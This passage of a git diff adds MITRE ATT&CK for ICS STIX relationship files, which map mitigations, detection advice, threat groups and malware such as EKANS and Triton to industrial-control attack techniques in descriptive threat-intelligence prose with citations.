"https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json new file mode 100644 index 0000000000000000000000000000000000000000..c9e0af25087ae2e5dd111092912144f39d67e6c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--20ef456c-f89d-4a58-aa62-4c21fdc5659e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--107d9a23-991b-44f5-97f6-7f6983c7013a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json new file mode 100644 index 0000000000000000000000000000000000000000..ef2a2101607f4a3698ab0e39db340ae2028c7f54 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cb112fa2-e3fb-44f7-b5aa-949c0959e942", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020", + "description": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA 2020, October 15 Indictment: Conspiracy to Commit an Offense Against the United States Retrieved. 2021/04/07 ", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:53:50.448Z", + "description": "In the Ukraine 2015 incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) sent spearphishing attachments to three energy distribution companies containing malware to gain access to victim systems. (Citation: UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json new file mode 100644 index 0000000000000000000000000000000000000000..d85151cd92ab10ef59f5fb013bddda82aac00381 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--00e3dc40-34fb-459d-b620-14e4578ad00c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10e87e4b-a231-42e3-a011-0031f8226936", + "created": "2022-09-26T17:15:51.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:51.819Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json new file mode 100644 index 0000000000000000000000000000000000000000..47cd60a255163725353b8837daa62e2728d0c3cc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0f65c7c2-9297-495e-96e4-c8af77047efa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:09:35.145Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if reporting messages are blocked. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json new file mode 100644 index 0000000000000000000000000000000000000000..e0b1f0eb297fc607b2fd1366b5aa2bfc7e6419e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json 
@@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--ab60f407-cf6f-40cb-821d-b6d4946d1ca4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--111f437a-c67d-40e4-9515-7e9b22e65eff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.234Z", + "relationship_type": "mitigates", + "description": "Audit domain and local accounts and their permission levels routinely to look for situations that could allow an adversary to gain system wide access with stolen privileged account credentials. (Citation: Microsoft May 2017) (Citation: Microsoft August 2018)These audits should also identify if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft February 2019)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Microsoft May 2017", + "description": "Microsoft 2017, May Attractive Accounts for Credential Theft Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft" + }, + { + "source_name": "Microsoft August 2018", + "description": "Microsoft 2018, August Implementing Least-Privilege Administrative Models Retrieved. 
2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models" + }, + { + "source_name": "Microsoft February 2019", + "description": "Microsoft 2019, February Active Directory administrative tier model Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json new file mode 100644 index 0000000000000000000000000000000000000000..986a4306c665a099401cb09d1380762f4f58b018 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--69423f15-2d3f-42cc-8232-fd18a22bc1c2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:03.003Z", + "description": "Program uploads may be observable in ICS management protocols or file transfer protocols. Note when protocol functions related to program uploads occur. In cases where the ICS protocols is not well understood, one option is to examine network traffic for the program files themselves using signature-based tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json new file mode 100644 index 0000000000000000000000000000000000000000..2060e9446392fbd54d03151be1795de1b1ed1834 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--90dde535-1f13-461a-a6e3-cddc6b453c1b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + }, + { + "source_name": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020", + "description": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly 2020, July 15 Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT Retrieved. 2021/04/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:45:28.094Z", + "description": "Before encrypting the process, [EKANS](https://attack.mitre.org/software/S0605) first kills the process if its name matches one of the processes defined on the kill-list. (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) EKANS also utilizes netsh commands to implement firewall rules that blocks any remote communication with the device. 
(Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json new file mode 100644 index 0000000000000000000000000000000000000000..bccf98a4e387abd82706c65c6e53f650dc803465 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--dc51052f-166e-472d-9f79-c738c8f1f69b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:34.653Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json new file mode 100644 index 0000000000000000000000000000000000000000..f0c2f12524f72176a2622d35d2640ac3cf2b2a57 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ac5181ef-95a6-4248-8b4b-a691581729da", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.077Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json new file mode 100644 index 0000000000000000000000000000000000000000..72384758983ef960794828c6ecdcc6c096977bda --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--37ebd044-1701-494c-adb8-e0e9e8568623", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f", + "created": "2022-09-26T18:41:48.947Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:48.947Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json new file mode 100644 index 0000000000000000000000000000000000000000..0da0167d5c541a002bade3ff245ff8a1feafb55b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0ace630c-8e74-4a17-b09d-a7292ad32e1f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13809e98-1d74-4c39-b882-9d523c76cbde", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:07.929Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s imain.bin payload takes commands from the TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex) and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json new file mode 100644 index 0000000000000000000000000000000000000000..e5adfab40aa9b4998f40915ed41b79ee419a330c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--6cae3edc-133c-4640-9db8-536f8bc546b1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json new file mode 100644 index 0000000000000000000000000000000000000000..e873cd75211d6ff64a8a750d8ab11f5bc903909c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--d12cf3c9-f24a-4639-b28b-c3bb4a9af9b5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:38:23.604Z", + "description": "Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json new file mode 100644 index 0000000000000000000000000000000000000000..461a10680591830c4f98c460b347367a17a9ea25 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e22bd03f-bb98-410a-a19b-53a198a95bff", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147c2158-b2af-4d88-9d59-594c67a9200e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json new file mode 100644 index 0000000000000000000000000000000000000000..5aef6fe42733d506ce2043afe22f0a2f1a24fbc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--8228b3ca-dd81-41f6-998e-7f23bc6f61cd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--15188683-7ded-4578-9102-73459ecbe095", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:37:54.914Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host\u2019s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json new file mode 100644 index 0000000000000000000000000000000000000000..c23d9151a5cc44f3dec397afe7121b7a94927a55 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--34102d90-ed05-438c-8af1-bb3bda7bcbbc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--154de746-5ea2-43b4-97b2-221b2433cbde", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:48:49.308Z", + "description": "Monitor ICS automation network protocols for information that an asset has been placed into Firmware Update Mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json new file mode 100644 index 0000000000000000000000000000000000000000..82cdaf1934e9a15b3dd282ae5f447f18492a1e83 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--51f1b0bd-4c85-43c3-8743-b4bd17252ba6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--15a39e3b-124e-4e68-95b5-7b8020225c12", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:27.289Z", + "description": "Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. ", + 